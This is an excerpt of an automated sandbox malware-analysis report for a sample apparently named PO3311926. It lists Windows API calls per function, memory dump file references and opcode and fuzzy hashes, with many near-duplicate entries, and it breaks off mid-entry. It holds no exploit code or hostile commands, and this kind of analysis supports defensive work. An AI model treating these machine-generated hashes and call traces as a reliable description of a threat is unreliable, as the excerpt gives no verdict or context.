                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: ChangeCloseFindNotification
                                                                                              • String ID:
                                                                                              • API String ID: 2591292051-0
                                                                                              • Opcode ID: a67de794b8fcd4d40e4135f0bc77064e433e988c0dc92aab874ec73f896c4746
                                                                                              • Instruction ID: a82e77051261c77f69a8e092c3bbd3f0a90f7d88666c76756b3f4381836cf4d0
                                                                                              • Opcode Fuzzy Hash: a67de794b8fcd4d40e4135f0bc77064e433e988c0dc92aab874ec73f896c4746
                                                                                              • Instruction Fuzzy Hash: 9BF0BE7008AB059FDB308E28C558B92B7E8EF13321F040B9E90E2429E0D770698DAA40
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 00BAA69B: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00BAA592,000000FF,?,?), ref: 00BAA6C4
                                                                                                • Part of subcall function 00BAA69B: FindFirstFileW.KERNEL32(?,?,?,?,00000800,?,?,?,?,00BAA592,000000FF,?,?), ref: 00BAA6F2
                                                                                                • Part of subcall function 00BAA69B: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00BAA592,000000FF,?,?), ref: 00BAA6FE
                                                                                              • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00BAA598
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: Find$FileFirst$CloseErrorLast
                                                                                              • String ID:
                                                                                              • API String ID: 1464966427-0
                                                                                              • Opcode ID: 0b853ac186c8c505b962c5b6c2151e48ebcd418ce1e1f2d7862c3a0238922e7c
                                                                                              • Instruction ID: 0f543557c46e7295b51dbe2b6d24631d8b0f58622552937f378d60b8f064a30b
                                                                                              • Opcode Fuzzy Hash: 0b853ac186c8c505b962c5b6c2151e48ebcd418ce1e1f2d7862c3a0238922e7c
                                                                                              • Instruction Fuzzy Hash: 65F05E3140D790AACA225BB48904BCABBD06F2B321F048A8AF1F952196C36550A4DB33
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SetThreadExecutionState.KERNEL32(00000001), ref: 00BB0E3D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExecutionStateThread
                                                                                              • String ID:
                                                                                              • API String ID: 2211380416-0
                                                                                              • Opcode ID: 0ede0f9781981de8e303615275928f493c7a1c7740e34a99776dd9db8b3a32b8
                                                                                              • Instruction ID: d4aedb9b678c68b8d4d41cefd23b2464e3477648120cfa2a953bef2c2bb1f78e
                                                                                              • Opcode Fuzzy Hash: 0ede0f9781981de8e303615275928f493c7a1c7740e34a99776dd9db8b3a32b8
                                                                                              • Instruction Fuzzy Hash: 1ED0C221A1A09417DB21332C68757FF26C6CFC7320F0C08E6B1455B183DE944882A262
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GdipAlloc.GDIPLUS(00000010), ref: 00BBA62C
                                                                                                • Part of subcall function 00BBA3B9: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00BBA3DA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: Gdip$AllocBitmapCreateFromStream
                                                                                              • String ID:
                                                                                              • API String ID: 1915507550-0
                                                                                              • Opcode ID: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                                                              • Instruction ID: 2a2a9f31c99a2acc5674450d9cad253d684315b208a9a2892a0f7db99a937e73
                                                                                              • Opcode Fuzzy Hash: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                                                              • Instruction Fuzzy Hash: 2AD0C9B1A10209BBDF466F618C529FE7AD9EB00340F0481A5B842D5192EEF1E910A666
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • DloadProtectSection.DELAYIMP ref: 00BBE5E3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: DloadProtectSection
                                                                                              • String ID:
                                                                                              • API String ID: 2203082970-0
                                                                                              • Opcode ID: 903204d0013fba60ba0e1fa355ab3232a0f8fb366764f439864ca25a4a8bd414
                                                                                              • Instruction ID: 28c6dc4895f39bb4a9edf18e851ee28cef3aec9c4e08ac4f53a8386c20d7c692
                                                                                              • Opcode Fuzzy Hash: 903204d0013fba60ba0e1fa355ab3232a0f8fb366764f439864ca25a4a8bd414
                                                                                              • Instruction Fuzzy Hash: 29D0C9B01802409BE622EBA99886BF877D4B724705FA80191B569924B5DBE4C481C615
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,00BB1B3E), ref: 00BBDD92
                                                                                                • Part of subcall function 00BBB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00BBB579
                                                                                                • Part of subcall function 00BBB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00BBB58A
                                                                                                • Part of subcall function 00BBB568: IsDialogMessageW.USER32(0001042E,?), ref: 00BBB59E
                                                                                                • Part of subcall function 00BBB568: TranslateMessage.USER32(?), ref: 00BBB5AC
                                                                                                • Part of subcall function 00BBB568: DispatchMessageW.USER32(?), ref: 00BBB5B6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: Message$DialogDispatchItemPeekSendTranslate
                                                                                              • String ID:
                                                                                              • API String ID: 897784432-0
                                                                                              • Opcode ID: 4b2f0309c6825968b281260e7d19866eabaece2e465799e746ad710e858cab0e
                                                                                              • Instruction ID: bfc667189c9b0000a0189f6c936880ce646b6ec6b0757c274c6754dcce313fd8
                                                                                              • Opcode Fuzzy Hash: 4b2f0309c6825968b281260e7d19866eabaece2e465799e746ad710e858cab0e
                                                                                              • Instruction Fuzzy Hash: 43D09E31154340BBDA112B51DD06F5F7AE6AB98B04F004594B285740F18AB2DD21DB12
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetFileType.KERNELBASE(000000FF,00BA97BE), ref: 00BA98C8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileType
                                                                                              • String ID:
                                                                                              • API String ID: 3081899298-0
                                                                                              • Opcode ID: 48a7fb012598134a5dbdb23bd46f1d5638a98befb9c332c3062fc72001a27df6
                                                                                              • Instruction ID: e564eb5a92220abb11d9364fa9332ae5dc09631c4c2c069330520ac66bb44165
                                                                                              • Opcode Fuzzy Hash: 48a7fb012598134a5dbdb23bd46f1d5638a98befb9c332c3062fc72001a27df6
                                                                                              • Instruction Fuzzy Hash: 8EC01238408205868E208B249848099B3A2EE537E67B486D4C0388A0E2C32ACC87FA11
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00BBE1E3
                                                                                                • Part of subcall function 00BBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBE8D0
                                                                                                • Part of subcall function 00BBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 3c14ea71a1d54747e529bf36bcff3f90f623037484e4ec26bcd608171c33c7e5
                                                                                              • Instruction ID: 769aa33f161ba3b7afc27ddc446731c3e2a986ad76dadd8bf907502a7dc291e2
                                                                                              • Opcode Fuzzy Hash: 3c14ea71a1d54747e529bf36bcff3f90f623037484e4ec26bcd608171c33c7e5
                                                                                              • Instruction Fuzzy Hash: C7B012E1258141EE350452096C03CFB01CDC0C5B10330C0BFFC25C02E0F8C0EC044471
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00BBE1E3
                                                                                                • Part of subcall function 00BBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBE8D0
                                                                                                • Part of subcall function 00BBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: ca2a0e108d50411e120310cb8fa60577801a90ed275e8ed8dedb66170b249429
                                                                                              • Instruction ID: e462d60dce24eb14fb20c87c660e64d25281ca35693b358879716cf626e7645c
                                                                                              • Opcode Fuzzy Hash: ca2a0e108d50411e120310cb8fa60577801a90ed275e8ed8dedb66170b249429
                                                                                              • Instruction Fuzzy Hash: 3EB092E5258141AE350451496C42CBB01CDD088B1033080AAB825C01A0E880AC004531
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00BBE1E3
                                                                                                • Part of subcall function 00BBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBE8D0
                                                                                                • Part of subcall function 00BBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 89ed5e6f6fec5d1e22b7b595418615b2b96d274d41fc85de5394e1143e2dd532
                                                                                              • Instruction ID: e7c26191aafc05ce2e0739d32266ea653d20a0b683c6c4391781299586956f84
                                                                                              • Opcode Fuzzy Hash: 89ed5e6f6fec5d1e22b7b595418615b2b96d274d41fc85de5394e1143e2dd532
                                                                                              • Instruction Fuzzy Hash: 34B092E5258141AE250411496C42CBB018DC085B10330C4AAB821D04A0E880EC004471
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00BBE1E3
                                                                                                • Part of subcall function 00BBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBE8D0
                                                                                                • Part of subcall function 00BBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 5b0dee73a631096e1499db2a8e304fd1353967a670a0af26ee93d50acfa190d1
                                                                                              • Instruction ID: 990b91995d0ce80d16d2b03ffcac193de912d95c1a68fe886fcccdfab337f6e6
                                                                                              • Opcode Fuzzy Hash: 5b0dee73a631096e1499db2a8e304fd1353967a670a0af26ee93d50acfa190d1
                                                                                              • Instruction Fuzzy Hash: 63B012E1258041AE350451096C03CFB01CDD0C8F10330C4BFF825C01E0F8C0EC404431
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00BBE1E3
                                                                                                • Part of subcall function 00BBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBE8D0
                                                                                                • Part of subcall function 00BBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 777ba39b5e2f6be3b6f8c5a5d13f1738c7c0dab78e96d8e0bfce0304d33dfaa4
                                                                                              • Instruction ID: e89ff77e0034de3e7e38fffc6dfe3528a9a8aba8311364736fdb328905ecf53b
                                                                                              • Opcode Fuzzy Hash: 777ba39b5e2f6be3b6f8c5a5d13f1738c7c0dab78e96d8e0bfce0304d33dfaa4
                                                                                              • Instruction Fuzzy Hash: 58B012F1258041AE3504510A6D03CFB41DDC0C4B10330C0BFF825C01E0FCC0ED014431
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00BBEAF9
                                                                                                • Part of subcall function 00BBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBE8D0
                                                                                                • Part of subcall function 00BBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 1bce09b426158f3efbaf9d71db3a28e00cb03bc0c7ec68ddb2ca78837b2fab12
                                                                                              • Instruction ID: bc5b25e7b66ce5d039de28b861ed5491b0f9aa0e2ad90f1651fd107e8d369fbd
                                                                                              • Opcode Fuzzy Hash: 1bce09b426158f3efbaf9d71db3a28e00cb03bc0c7ec68ddb2ca78837b2fab12
                                                                                              • Instruction Fuzzy Hash: DDB092CA29A4827E290462015E82CB6498DC4C0B9032080AAB420C80A2E8C088014471
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00BBE1E3
                                                                                                • Part of subcall function 00BBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBE8D0
                                                                                                • Part of subcall function 00BBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: e84aa5dafaa8f7dc0a10fcc62056a2a88d51740498120c120bf4b2feecc4e63a
                                                                                              • Instruction ID: a9003eb86a3f5949ca9d528943bf91145bd1f2f8e273be97ee1e05a96fa2e551
                                                                                              • Opcode Fuzzy Hash: e84aa5dafaa8f7dc0a10fcc62056a2a88d51740498120c120bf4b2feecc4e63a
                                                                                              • Instruction Fuzzy Hash: E1B012F1258041AE3604510A6C03CFB41CDD0C8F10330C0BFF826C01E0F8C0ED004431
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00BBE1E3
                                                                                                • Part of subcall function 00BBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBE8D0
                                                                                                • Part of subcall function 00BBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 155053dd01a6ad98ac383aeb36311e4c29ee6f1edc7be2d2fe8f238aa1e5afe3
